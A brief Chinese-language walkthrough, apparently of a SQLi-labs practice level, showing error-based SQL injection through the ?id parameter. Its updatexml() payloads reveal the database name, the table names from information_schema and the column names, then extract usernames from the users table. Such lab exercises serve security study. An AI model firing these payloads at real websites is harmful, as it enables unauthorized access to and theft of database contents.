只能尝试一下报错注入用到的函数是?id=1" union select 1,updatexml(1,concat(0x7e,database()),1),3 --+
查询到了数据库然后我们就要去查询一下他的表名,?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
查询到的表名~emails,referers,uagents,users'
然后我们就要去查询他的表名下面的列名?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='uagents')),1)--+
查询到的列名为id,uagent,ip_address,username'
?id=1" union select 1,2,updatexml (1,concat(0x7e,(select group_concat(username) from users)),1) --+